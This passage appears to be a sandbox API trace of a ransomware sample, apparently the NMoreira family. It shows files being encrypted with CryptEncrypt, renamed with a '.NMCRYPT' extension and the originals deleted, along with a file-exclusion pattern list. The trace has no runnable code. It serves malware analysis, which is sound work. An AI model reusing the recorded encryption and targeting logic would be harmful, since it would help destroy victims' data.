dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.455] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.456] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.456] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.456] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.456] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.456] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.456] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.456] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0163.456] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.456] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad678) returned 1 [0163.456] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.456] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.456] wcslen (_String="\\\\?\\") returned 0x4 [0163.457] CryptDuplicateKey (in: hKey=0x9ad678, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad338) returned 1 [0163.457] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.457] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.457] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2920) returned 1 [0163.457] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.458] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.458] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.458] GetLastError () returned 0x0 [0163.458] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.469] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.469] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.469] GetLastError () returned 0x0 [0163.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.470] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.470] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.470] GetLastError () returned 0x0 [0163.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.470] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.470] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.470] GetLastError () returned 0x0 [0163.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.470] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.470] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.470] GetLastError () returned 0x0 [0163.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.470] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.470] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.470] GetLastError () returned 0x0 [0163.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.470] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.470] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.470] GetLastError () returned 0x0 [0163.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.470] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.470] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.470] GetLastError () returned 0x0 [0163.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.470] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.471] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.471] GetLastError () returned 0x0 [0163.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.471] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.471] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.471] GetLastError () returned 0x0 [0163.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.471] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.471] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.471] GetLastError () returned 0x0 [0163.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.471] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x68, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x68, lpOverlapped=0x0) returned 1 [0163.471] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x68, dwBufLen=0xa00 | out: pbData=0x1d467fa8*, pdwDataLen=0x2d7e628*=0x70) returned 1 [0163.471] GetLastError () returned 0x0 [0163.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d467fa8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467fa8*, lpNumberOfBytesWritten=0x2d7e63c*=0x70, lpOverlapped=0x0) returned 1 [0163.471] ReadFile (in: hFile=0x1624, lpBuffer=0x1d467dd0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.471] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf")) returned 0x20 [0163.471] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf", dwFileAttributes=0x20) returned 0 [0163.472] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf") returned 1 [0163.472] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf")) returned 0 [0163.472] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf" [0163.472] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.472] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF202.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf202.tmp")) returned 0xf202 [0163.473] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF202.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf202.tmp"), dwFlags=0x1) returned 0 [0163.473] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF202.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf202.tmp")) returned 1 [0163.473] CryptDestroyKey (hKey=0x9ad338) returned 1 [0163.473] wcslen (_String="OK") returned 0x2 [0163.473] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.473] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.473] CryptDestroyKey (hKey=0x9ad678) returned 1 [0163.473] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0163.473] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0163.473] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*NMCRYPT") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*Recovers your files.html") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*.exe") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*.dll") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*.lnk") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*.bat") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*.ini") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*.msi") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*.scf") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*pagefile.sys*") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*NTUSER.DAT*") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*AppData*") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*\\winrar\\*") returned 0 [0163.473] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*\\java\\*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*\\TeamViewer\\*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*\\windows\\*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*\\ESET\\*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*\\AVG\\*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*\\AVIRA\\*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*\\AVAST Software\\*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*Atheros*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*Realtek*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*bootmgr*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*boot*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*boot*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*CONFIG.SYS*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*IO.SYS*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*MSDOS.SYS*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*NTDETECT.COM*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*ntldr*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*chrome*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*opera*") returned 0 [0163.474] PathMatchSpecW (pszFile="grid_(inch).wmf", pszSpec="*firefox*") returned 0 [0163.474] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf", pszSpec="*") returned 1 [0163.474] strlen (_Str="NMoreira") returned 0x8 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.475] CryptGenRandom (in: hProv=0x8bf310, 